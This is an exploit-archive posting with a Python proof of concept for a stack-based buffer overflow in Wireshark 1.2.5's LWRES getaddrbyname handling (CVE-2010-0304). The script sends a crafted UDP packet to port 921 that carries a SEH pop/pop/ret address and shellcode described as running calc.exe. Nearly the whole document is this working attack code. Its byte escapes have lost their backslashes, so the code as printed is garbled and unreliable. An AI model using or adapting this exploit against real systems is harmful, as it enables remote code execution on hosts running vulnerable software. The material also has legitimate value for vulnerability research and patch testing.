wiresharklwres-overflow.txt
Posted on 15 February 2010
# Exploit Title: Wireshark 1.2.5 LWRES getaddrbyname BOF - Calc.exe # Date: 2-14-2010 # Author: Nullthreat and Pure|Hate # Software Link: http://media-2.cacetech.com/wireshark/win32/wireshark-win32-1.2.5.exe # Version: 1.2.5 # Tested on: Windows XP SP2 # CVE : 2010-0304 # OSVDB-ID: 61987<http://osvdb.org/show/osvdb/61987> # Code : #!/usr/bin/env python # Wireshark 1.2.5 LWRES getaddrbyname stack-based buffer overflow # Discovered by babi # Exploit Dev by Nullthreat & Pure|Hate import socket, sys try: host = sys.argv[1] except: print "usage: " + sys.argv[0] + " <host>" exit(2) port = 921 addr = (host, port) leng = 9150 high = int(leng / 256) low = leng & 255 crash = ("A" * 2128) # Short jump jmp = "x90x90x06xeb" # pop/pop/ret in pcre3 0x61b4121b ppr = "x1bx12xb4x61" nop = ("x90" * 24) # 224 bytes = calc.exe shellcode = ( "xbfx86x0ax33xa0x2bxc9xdaxd9xd9x74x24xf4xb1" "x32x5ex31x7ex11x03x7ex11x83xc6x82xe8xc6x5c" "x62x65x28x9dx72x16xa0x78x43x04xd6x09xf1x98" "x9cx5cxf9x53xf0x74x8ax16xddx7bx3bx9cx3bxb5" "xbcx10x84x19x7ex32x78x60x52x94x41xabxa7xd5" "x86xd6x47x87x5fx9cxf5x38xebxe0xc5x39x3bx6f" "x75x42x3exb0x01xf8x41xe1xb9x77x09x19xb2xd0" "xaax18x17x03x96x53x1cxf0x6cx62xf4xc8x8dx54" "x38x86xb3x58xb5xd6xf4x5fx25xadx0ex9cxd8xb6" "xd4xdex06x32xc9x79xcdxe4x29x7bx02x72xb9x77" "xefxf0xe5x9bxeexd5x9dxa0x7bxd8x71x21x3fxff" "x55x69xe4x9exccxd7x4bx9ex0fxbfx34x3ax5bx52" "x21x3cx06x39xb4xccx3cx04xb6xcex3ex27xdexff" "xb5xa8x99xffx1fx8dx55x4ax3dxa4xfdx13xd7xf4" "x60xa4x0dx3ax9cx27xa4xc3x5bx37xcdxc6x20xff" "x3dxbbx39x6ax42x68x3axbfx21xefxa8x23xa6xe5" ) crash2 = ("xcc" * 6752) data = "x00x00x01x5dx00x00x00x00x4bx49x1cx52x00x01x00x01" data += "x00x00x00x00x00x00x40x00x00x00x00x00x00x00x00x00" data += "x00x00x00x01" data += chr(high) + chr(low) + crash + jmp + ppr + nop + shellcode + crash2 + "x00x00" udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) try: udps.sendto(data, addr) except: print "can't lookup host" exit(1) udps.close() exit(0)